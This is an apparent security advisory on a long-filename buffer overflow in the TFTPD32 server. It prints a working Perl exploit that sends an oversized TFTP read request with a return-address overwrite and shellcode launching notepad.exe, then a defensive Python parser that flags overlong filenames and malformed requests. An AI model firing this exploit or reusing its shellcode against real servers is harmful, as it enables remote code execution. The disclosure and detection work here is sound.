TFTPD32 Buffer Overflow Vulnerability (Long filename)

Summary

TFTPD32 is a freeware TFTP server for Windows 9x/NT/XP. It implements the TFTPv2 protocol (specified in RFC 1350).

A vulnerability in the product allows remote attackers to cause the product to execute arbitrary code.

Credit:

The information has been provided by SecurITeam Experts.


Details

Vulnerable systems:
 * TFTPD32 version 2.21 and prior

Immune systems:
 * TFTPD32 version 2.50.2

Exploit:
#!/usr/bin/perl
# TFTP Server remote Buffer Overflow
use strict;
use warnings;
use IO::Socket;   # also exports inet_aton, sockaddr_in, send from Socket

my $host = '192.168.1.53';
my $port = '69';
my $data = 'A';
my $buf  = '';

# RFC 1350 request layout: opcode (2 bytes) | filename | NUL | mode | NUL
#$buf .= "\x00\x02"; # Opcode 2 = WRQ (send/write) -- choose one
$buf .= "\x00\x01";  # Opcode 1 = RRQ (receive/read)

# Over-long filename: filler up to the saved return address
$buf .= 'A';
my $num = '116';
$buf .= $data x $num;
$buf .= '.';
$num = '140'; # EIP section
$buf .= $data x $num;

my $address = "\xFF\xFF\xFF\xFF";
$buf .= $address;

my $egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= 'notepad.exe';

$egg .= "\x90\x90\x90\x90\x90\x90";
$buf .= $egg;

# Filename terminator, transfer mode, mode terminator
$buf .= "\x00binary\x00";

my $socket = IO::Socket::INET->new(Proto => 'udp') or die "Socket error: $@\n";
my $ipaddr = inet_aton($host) || $host;
my $portaddr = sockaddr_in($port, $ipaddr);
send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n";
print "Now, $host should open up a notepad\n";
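The condition the advisory describes is a read/write request whose filename field is far longer than any real boot-file name. The following is an added defensive example, not code from the advisory or from the TFTPD32 project: a small RFC 1350 request parser that a TFTP server, proxy or IDS rule could apply before the filename reaches any fixed-size buffer. It flags over-long filenames, transfer modes the RFC does not define, and requests whose NUL terminators are missing. The length budget of 128 bytes and the sample datagrams are assumptions constructed for the example.

```python
"""
Defensive parser for TFTP read/write requests (RFC 1350).
Flags requests whose filename exceeds a length budget, requests with a
non-RFC transfer mode, and malformed (unterminated) requests.
All sample packets are constructed for this example, not captured traffic.
"""
import struct
from typing import Dict, List, Optional

RRQ, WRQ = 1, 2
VALID_MODES = {b"netascii", b"octet", b"mail"}
# Policy threshold (assumption, not from the advisory): legitimate TFTP
# boot-file names are short; anything beyond this is worth a closer look.
MAX_FILENAME_LEN = 128


def parse_request(packet: bytes) -> Optional[dict]:
    """Return {'opcode','filename','mode'} for an RRQ/WRQ, None for other opcodes.

    Layout: 2-byte big-endian opcode | filename | NUL | mode | NUL
    Raises ValueError when a terminator is missing.
    """
    if len(packet) < 2:
        raise ValueError("packet shorter than opcode field")
    (opcode,) = struct.unpack("!H", packet[:2])
    if opcode not in (RRQ, WRQ):
        return None
    body = packet[2:]
    end_name = body.find(b"\x00")
    if end_name < 0:
        raise ValueError("filename not NUL-terminated")
    end_mode = body.find(b"\x00", end_name + 1)
    if end_mode < 0:
        raise ValueError("mode not NUL-terminated")
    return {
        "opcode": opcode,
        "filename": body[:end_name],
        "mode": body[end_name + 1:end_mode],
    }


def inspect_request(packet: bytes, max_len: int = MAX_FILENAME_LEN) -> List[str]:
    """Return finding strings for one datagram; an empty list means it looks benign."""
    findings: List[str] = []
    try:
        req = parse_request(packet)
    except ValueError as exc:
        return [f"malformed request: {exc}"]
    if req is None:
        return findings  # DATA/ACK/ERROR carry no filename
    name_len = len(req["filename"])
    if name_len > max_len:
        findings.append(f"filename length {name_len} exceeds {max_len}")
    if req["mode"].lower() not in VALID_MODES:
        findings.append(f"non-RFC transfer mode {req['mode']!r}")
    return findings


# Constructed sample datagrams (hypothetical, not captured traffic).
SAMPLES: Dict[str, bytes] = {
    "benign_rrq": b"\x00\x01" + b"pxelinux.0" + b"\x00" + b"octet" + b"\x00",
    "long_name_wrq": b"\x00\x02" + b"A" * 300 + b"\x00" + b"octet" + b"\x00",
    "odd_mode": b"\x00\x01" + b"config.cfg" + b"\x00" + b"binary" + b"\x00",
    "truncated": b"\x00\x01" + b"noterminator",
    "data_packet": b"\x00\x03\x00\x01" + b"payload",
}


def scan(samples: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Run inspect_request over every sample; keep only those with findings."""
    results = {}
    for name, pkt in samples.items():
        findings = inspect_request(pkt)
        if findings:
            results[name] = findings
    return results


if __name__ == "__main__":
    for name, findings in scan(SAMPLES).items():
        print(f"{name}: {'; '.join(findings)}")
```

A server-side fix is the same check in the other direction: reject the request (TFTP ERROR packet, code 0 or 4) before the filename is copied anywhere, rather than truncating it silently, so the event is visible in logs.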

Categories: Windows